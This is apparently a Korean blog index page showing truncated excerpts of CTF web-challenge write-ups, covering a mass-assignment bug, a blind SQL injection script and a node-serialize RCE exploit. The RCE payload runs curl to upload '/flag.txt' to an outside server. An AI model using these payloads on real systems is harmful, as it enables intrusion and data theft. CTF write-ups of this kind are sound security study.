buyme 플래그 구매하는 기능에서 취약점이 발생한다. router.post("/buy", requiresLogin, async (req, res) => { if(!req.body.flag) { return res.redirect("/flags?error=" + encodeURIComponent("Missing flag to buy")); } try { db.buyFlag({ user: req.user, ...req.body }); } catch(err) { return res.redirect("/flags?error=" + encodeURIComponent(err.message)); } res.redirect("/?message=" + encodeURIComponent("Flag bought succe..
들어가면 파라미터 2개가 있는데 두개 파라미터 모두에서 sql injection이 터진다. order by뒤에서 터지는 건데 그냥 subquery로 행 여러개 리턴해서 500 error내는걸로 blind sql injection해주면 된다. import requests import sys from urllib.parse import quote import string #string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@-_$%^{}." url = 'http://poxecenter.sstf.site:31888/demo/getGochaList?sortName=full_name&sortFlag=desc,' data..
https://gist.github.com/as3617/fa06307b5c1bcc002e3b646bfcc3500d exploit code IJCTF 2021 - memory writeup IJCTF 2021 - memory writeup. GitHub Gist: instantly share code, notes, and snippets. gist.github.com disabled_functions are except putenv, mail clean_up option for session is off When the UPLOAD_PROGRESS meets clean_up option as off that session file will have the path for the uploaded file. ..
[https://letschat-web.2021.ctfcompetition.com/](https://letschat-web.2021.ctfcompetition.com/)들어가면 invitecode를 입력하라고 나오지만 이 부분은 그냥 무시해도 된다. response값을 200으로 바꾼다음 회원가입해서 로그인 해주면 아래와 같은 화면이 나온다. 채팅방을 만들고 유저를 초대해서 대화를 할 수 있는데 내가 문제를 보기 시작했을 때는 트롤링 때문에 모든 유저의 채팅을 마스킹처리했다고 한다. 근데 아무리 봐도 전혀 취약점이 없었다. 그러다 발견한게 있었는데 http://letschat-messages-web.2021.ctfcompetition.com/a99fb895-e6db-11eb-88a1-a2a63078d4f..
Description http://111.186.59.2:50080 http://111.186.59.2:50081 http://111.186.59.2:50082 The three servers are the same, you can choose any one. server will be reset every 10 minutes. this chall is almost same https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html.
보호되어 있는 글입니다.
Only Exploit Code.. sparta - node-serialize rce # https://www.exploit-db.com/exploits/49552 import requests import re import base64 import sys url = 'http://web.zh3r0.cf:6666/guest' # change this payload = """function(){require('child_process').exec('curl -F file1=@/flag.txt server:1234',function(error, stdout, stderr){return stdout;});}()""" # rce = "_$$ND_FUNC$$_process.exit(0)" # code ="_$$ND..
Team Alpray